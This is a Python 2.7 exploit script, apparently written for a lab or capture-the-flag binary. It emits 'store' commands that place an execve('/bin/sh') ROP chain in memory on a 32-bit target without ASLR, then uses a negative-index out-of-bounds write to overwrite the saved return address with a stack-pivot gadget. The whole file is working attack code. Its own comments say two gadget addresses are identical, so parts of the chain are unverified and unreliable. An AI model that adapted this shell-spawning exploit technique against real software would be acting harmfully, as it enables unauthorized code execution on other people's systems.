#!/usr/bin/python2.7
import struct
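# Target-specific constants.  Every address below is baked to one 32-bit,
# non-PIE build of the lab binary running without ASLR (BUF_ADDR_PTR is a
# raw stack address); none of them survive a rebuild or a randomised stack.
JUNK = 0x00000000           # filler for the slots the store loop never writes
PIVOT_ESP_44 = 0x08049bb7   # stack-pivot gadget written over the saved return address
POP_ECX_EBX = 0x0806f3d1    # pop ecx ; pop ebx ; ret   (per its name -- confirm)
POP_EBX_EDI = 0x0806f3d1    # pop ebx ; pop edi ; ret   (per its name -- confirm)
# NOTE(review): POP_ECX_EBX and POP_EBX_EDI are the same address, so either one
# label is wrong or the gadget is longer than its name says.  The register
# assignments in build_rop_chain() assume the names are right; check the
# disassembly before trusting them.
INT_80 = 0x08048eaa         # int 0x80
POP_EAX = 0x080bc4d6        # pop eax ; ret
POP_EDX = 0x80e6255         # pop edx ; ret
XOR_EAX = 0x08054c30        # xor eax, eax ; ret
RET_4 = 0x0804854b          # ret 4: return, then drop one extra slot
BUF_ADDR_PTR = 0xbffff518   # stack address of slot 0 of the target's buffer
BIN_SH_IDX = 61             # slot index where "/bin/sh\0" is stored
BIN_SH_ADDR = BUF_ADDR_PTR + BIN_SH_IDX * 4
SYS_EXECVE = 0xB            # i386 execve syscall number
RA_IDX = -11                # negative slot index that reaches the saved return address
SLOT = 4                    # bytes per slot
SKIP_EVERY = 3              # the store loop leaves every third slot untouched


def _pack_slot(value):
    """Pack one little-endian 32-bit slot; struct.error if *value* is out of range."""
    return struct.pack('<L', value)


def _store(value, idx):
    """Format one 'store' command (value, then index) exactly as the target reads it."""
    return "store\n" + str(value) + "\n" + str(idx) + "\n"


def build_rop_chain():
    """Return the 15-slot execve("/bin/sh") ROP chain as a byte string.

    Slots whose index is a multiple of SKIP_EVERY are never written by
    store_commands(), so they hold JUNK here and the gadget order is chosen
    so that each of them is either popped into a register that is reloaded
    later (ebx, edi), popped into one that may be zero anyway (edx -- this
    assumes the unwritten slot reads as 0 in the target; confirm), or
    stepped over with RET_4.

    Every slot, including the JUNK ones, is packed to exactly SLOT bytes.
    (The previous version appended str(JUNK), i.e. the one-byte string "0",
    which shifted every later slot by one byte and left a 1-byte tail that
    made struct.unpack raise before the chain was emitted.)

    Intended state at INT_80: eax=11 (execve), ebx=&"/bin/sh",
    ecx=argv (slot BIN_SH_IDX+3, which holds the "/bin/sh" pointer), edx=envp.
    """
    slots = [
        JUNK,               # 0  never written
        POP_ECX_EBX,        # 1  pop ecx <- slot 2 ; pop ebx <- slot 3 ; ret -> slot 4
        BIN_SH_ADDR + 12,   # 2  ecx = address of slot BIN_SH_IDX+3 (3 * SLOT bytes on) = argv
        JUNK,               # 3  never written; lands in ebx, replaced by slot 5
        POP_EBX_EDI,        # 4  pop ebx <- slot 5 ; pop edi <- slot 6 ; ret -> slot 7
        BIN_SH_ADDR,        # 5  ebx = "/bin/sh"
        JUNK,               # 6  never written; lands in edi (unused)
        XOR_EAX,            # 7  eax = 0 ; ret -> slot 8
        POP_EDX,            # 8  pop edx <- slot 9 ; ret -> slot 10
        JUNK,               # 9  never written; becomes edx (envp)
        RET_4,              # 10 ret -> slot 11, then esp steps over slot 12
        POP_EAX,            # 11 pop eax <- slot 13 ; ret -> slot 14
        JUNK,               # 12 never written; skipped by RET_4
        SYS_EXECVE,         # 13 eax = 11
        INT_80,             # 14 execve(ebx, ecx, edx)
    ]
    return b"".join(_pack_slot(v) for v in slots)


def store_commands(chain):
    """Turn a packed chain into the 'store' commands that write it to the target.

    Args:
        chain: byte string made of whole SLOT-byte little-endian slots.

    Returns:
        list of command strings, one per slot whose index is not a multiple
        of SKIP_EVERY; those slots are left untouched.

    Raises:
        ValueError: if *chain* is not a whole number of slots.  Silently
        dropping a partial tail would emit a chain that simply crashes the
        target, which is much harder to debug than a failure here.
    """
    if len(chain) % SLOT:
        raise ValueError("chain length %d is not a multiple of %d" % (len(chain), SLOT))
    commands = []
    for idx in range(len(chain) // SLOT):
        if idx % SKIP_EVERY == 0:
            continue
        value = struct.unpack("<L", chain[idx * SLOT:(idx + 1) * SLOT])[0]
        commands.append(_store(value, idx))
    return commands


def main():
    """Print the complete command script for the target on stdout.

    Only single-argument print() calls are used so the output is identical
    under the python2.7 of the shebang and under Python 3 (each command
    already ends in a newline, so a blank line follows every command).
    """
    for command in store_commands(build_rop_chain()):
        print(command)
    # "/bin/sh\0" spans two slots.  The slot after it (index 63, a multiple
    # of 3) is left alone like every other third slot.
    print(_store(struct.unpack("<L", b"/bin")[0], BIN_SH_IDX))
    print(_store(struct.unpack("<L", b"/sh\x00")[0], BIN_SH_IDX + 1))
    # argv[0]: slot BIN_SH_IDX+3 holds the pointer to the string; chain slot 2
    # loads this slot's address into ecx.  argv[1] (the following slot) is
    # never written and is assumed to read as NULL -- confirm.
    print(_store(BIN_SH_ADDR, BIN_SH_IDX + 3))
    # Out-of-bounds write in the target: the negative index reaches back to
    # the saved return address, which the pivot gadget replaces.
    print(_store(PIVOT_ESP_44, RA_IDX))
    print("quit\n")


if __name__ == "__main__":
    main()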